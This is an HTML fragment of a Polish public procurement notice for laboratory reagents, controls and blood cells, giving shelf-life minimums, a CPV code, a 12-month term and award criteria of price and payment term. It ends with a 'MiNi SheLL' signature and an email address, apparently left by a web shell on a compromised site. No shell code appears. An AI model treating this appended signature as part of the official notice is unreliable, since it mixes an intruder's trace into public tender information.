1. Odczynniki i karty min. 6 miesięcy											
2. Kontrole i krwinki min. 6 tygodni.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com